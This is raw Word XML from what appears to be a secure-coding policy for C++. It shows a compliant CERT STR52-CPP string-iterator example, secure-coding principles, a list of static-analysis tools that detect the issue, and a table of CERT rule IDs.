                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BD9F1DC" w14:textId="1CE19678" w:rsidR="00F72634"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6125801" w14:textId="6DDC246A" w:rsidR="006F6766" w:rsidRDefault="006F6766" w:rsidP="0015146B">
            <w:r w:rsidRPr="006F6766">
              <w:t>(std::string::insert())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEF81B9" w14:textId="64204C0C" w:rsidR="00F72634" w:rsidRDefault="006F6766" w:rsidP="0015146B">
            <w:r>
              <w:t>The value of the iterator loc is updated after each call to insert() and the invalidated iterator is never accessed. The updated iterator is incremented at the end of the loop.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="66F887A3" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="12526862"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808080"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>#include &lt;string&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E7B3F3B"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5935AD26"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>f(</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>const</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string &amp;input) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B40683D"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string email;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70EBD967"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Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23003E54"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color w:val="008200"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>// Copy input into email converting ";" to " "</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B63E45F"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>std::string::iterator loc = email.begin();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223CF1C5"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b/>
                <w:bCs/>
                <w:color w:val="336699"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>for</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(auto i = input.begin(), e = input.end(); i != e; ++i, ++loc) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1713E391"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color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>loc = email.insert(loc, *i != </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>';'</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>? *i : </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="003366"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>' '</w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="710DF2B6" w14:textId="77777777" w:rsidR="006F6766"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333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>  </w:t>
            </w:r>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09D5B7CA" w14:textId="00E91D9A" w:rsidR="00F72634" w:rsidRPr="006F6766" w:rsidRDefault="006F6766" w:rsidP="006F6766">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F6766">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>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43C894B" w14:textId="77777777" w:rsidR="00381847" w:rsidRDefault="00E769D9">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Principles(s):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="316BF09E" w14:textId="4044AE2B" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">(9) Use Effective Quality Assurance Techniques- </w:t>
            </w:r>
            <w:r w:rsidR="00CB5589">
              <w:t xml:space="preserve">Incorporating good quality assurance techniques such as source code audits can help developers find issues such as the one presented in the noncompliant code where the </w:t>
            </w:r>
            <w:r w:rsidR="003401D8">
              <w:t>iterator was not valid.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A5DE480" w14:textId="65F1C1E7" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(4) Keep it Simple-</w:t>
            </w:r>
            <w:r w:rsidR="003401D8">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003401D8">
              <w:t>Using a generic algorithm such as std::replace() could have also been a compliant solution. Simplicity should be preferred over creating something new and complex.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2892146E" w14:textId="18452C2A" w:rsidR="007F6A57" w:rsidRDefault="007F6A57" w:rsidP="007F6A57">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
            </w:pPr>
            <w:r>
              <w:t>(1) Validate Input Data</w:t>
            </w:r>
            <w:r w:rsidR="003401D8">
              <w:t>- To do this, it is important to ensure the use of valid pointers, iterators, and references as this standard states.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AD8B784" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBCF7D7" w14:textId="3630DFE3" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Probable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B7CD542" w14:textId="2B64C296" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F0E433A" w14:textId="0C2A1B7B" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61360AD2" w14:textId="10C76666" w:rsidR="00381847" w:rsidRDefault="001A18E8">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AF60878" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CodeSonar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62B1460B" w14:textId="78647DF1" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45D8FD92" w14:textId="391D3315" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ALLOC.UAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3084A142" w14:textId="34B59C92" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Use After Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="3EDB9E1C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7134DB5C" w14:textId="3FFF9184" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Helix QAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13D0400D" w14:textId="0FF8E991" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3735EE4B" w14:textId="3CA4D6A9" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>C++4746, C++4747, C++4748, C++4749</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B03763C" w14:textId="1ACBD6DB" w:rsidR="00381847" w:rsidRDefault="00381847">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="7282C048" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A4D6880" w14:textId="0FA7BA7F" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Parasoft C/C++test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AE9F2F" w14:textId="2AAE54F3" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2022.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="041DC01E" w14:textId="7CCDCCEC" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT_CPP-STR52-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="046003E9" w14:textId="6ACD129F" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="001A18E8">
              <w:t>Use valid references, pointers, and iterators to reference elements of a basic_string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00381847" w14:paraId="7E43A7F6" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D1784AB" w14:textId="31C486D7" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Polyspace Bug Finder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A494700" w14:textId="0A75B176" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>R2022b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58358B4A" w14:textId="00AF6A4B" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>CERT C++: STR52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="192D69E1" w14:textId="20EF881C" w:rsidR="00381847" w:rsidRDefault="001A18E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="001A18E8">
              <w:t>Checks for use of invalid string iterator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54285E00" w14:textId="10BB6CCA" w:rsidR="00202458" w:rsidRDefault="00320576" w:rsidP="00202458">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>Automation enforcement begins as early in the pre-production process as the “Assess and plan” and “Design” stages. These stages could be important for understanding the standards presented in this policy, updating them if needed, and determining what tools can be used to make the automation process relating to these security threats more successful. During the “Build” stage, automation should already be implemented</w:t>
      </w:r>
      <w:r w:rsidR="00A8636D">
        <w:t xml:space="preserve"> within the development workflow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> even before the “Verify and test” stage to ensure that code is secure as it is being built. The “Verify and test” stage should be a verification that our code is secure, not the discovery of new threats</w:t>
      </w:r>
      <w:r w:rsidR="00202458">
        <w:t xml:space="preserve"> right before it is put into production. More security testing such as penetration tests will occur as production begins in the “Transition and healthy check” stage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAE42B" w14:textId="77777777" w:rsidR="00202458" w:rsidRDefault="00202458">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659F0AEA" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>DCL50-CPP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726DC4C" w:rsidR="00381847" w:rsidRDefault="00667DD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3B34319E" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>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FBC09FF" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>STR02-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61027C5A" w14:textId="04C9F67C" w:rsidR="00381847" w:rsidRDefault="00667DD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4467B84" w:rsidR="00381847" w:rsidRDefault="00667DD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104FD28" w:rsidR="00381847" w:rsidRDefault="00667D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F7956CB" w:rsidR="00381847" w:rsidRDefault="00667DD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BADB9BA" w:rsidR="00381847" w:rsidRDefault="00667DD0">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C9145FC" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>STR51-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752BE477" w14:textId="140E59CC" w:rsidR="00381847" w:rsidRDefault="00667DD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DCE18FD" w:rsidR="00381847" w:rsidRDefault="00667DD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2ABF29D" w:rsidR="00381847" w:rsidRDefault="00667D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A8E2217" w:rsidR="00381847" w:rsidRDefault="00667DD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8CB6F7C" w:rsidR="00381847" w:rsidRDefault="00667DD0">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E81B02D" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>STR52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308B96BF" w14:textId="3E1E6E30" w:rsidR="00381847" w:rsidRDefault="00667DD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D881BE4" w:rsidR="00381847" w:rsidRDefault="00667DD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28093E6E" w:rsidR="00381847" w:rsidRDefault="00667DD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2542EFC2" w:rsidR="00381847" w:rsidRDefault="00667DD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1242936" w14:textId="2C73D998" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>2</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9F0EC2D" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>MEM52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6864030F" w14:textId="4BF0C451" w:rsidR="00381847" w:rsidRDefault="00667DD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664846C" w:rsidR="00381847" w:rsidRDefault="00667DD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7C045F6" w:rsidR="00381847" w:rsidRDefault="00667D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8177534" w:rsidR="00381847" w:rsidRDefault="00667DD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262F273" w:rsidR="00381847" w:rsidRDefault="00667DD0">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D02D0C2" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>MEM53-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DCA5B40" w14:textId="20333653" w:rsidR="00381847" w:rsidRDefault="00667DD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4E4CDEA0" w:rsidR="00381847" w:rsidRDefault="00667DD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757723E2" w:rsidR="00381847" w:rsidRDefault="00667D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704E3504" w:rsidR="00381847" w:rsidRDefault="00667DD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660536DA" w:rsidR="00381847" w:rsidRDefault="00667DD0">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1484521" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>ERR55-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CFBEC18" w14:textId="06CB0439" w:rsidR="00381847" w:rsidRDefault="00667DD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501F9BA" w:rsidR="00381847" w:rsidRDefault="00667DD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05BCBE8" w:rsidR="00381847" w:rsidRDefault="00667DD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3684F509" w:rsidR="00381847" w:rsidRDefault="00667DD0">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4AE620CE" w:rsidR="00381847" w:rsidRDefault="00667DD0">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21C81EF" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>ERR56-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D0880A0" w14:textId="2AB0556B" w:rsidR="00381847" w:rsidRDefault="00667DD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9EA9321" w:rsidR="00381847" w:rsidRDefault="00667DD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3ECE553" w:rsidR="00381847" w:rsidRDefault="00667DD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41CF91B5" w:rsidR="00381847" w:rsidRDefault="00667DD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7E6600C1" w:rsidR="00381847" w:rsidRDefault="00667DD0">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3830DAA" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>MSC52-CPP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CBCE53" w14:textId="31A24988" w:rsidR="00381847" w:rsidRDefault="00667DD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436CD1A9" w:rsidR="00381847" w:rsidRDefault="00667DD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D66CCB2" w:rsidR="00381847" w:rsidRDefault="00667D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F2B8EAF" w:rsidR="00381847" w:rsidRDefault="00667DD0">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17B49774" w:rsidR="00381847" w:rsidRDefault="00667DD0">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F3C5359" w:rsidR="00381847" w:rsidRDefault="00667DD0">
            <w:r>
              <w:t>PRE31-C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1434" w:type="dxa"/>
          </w:tcPr>
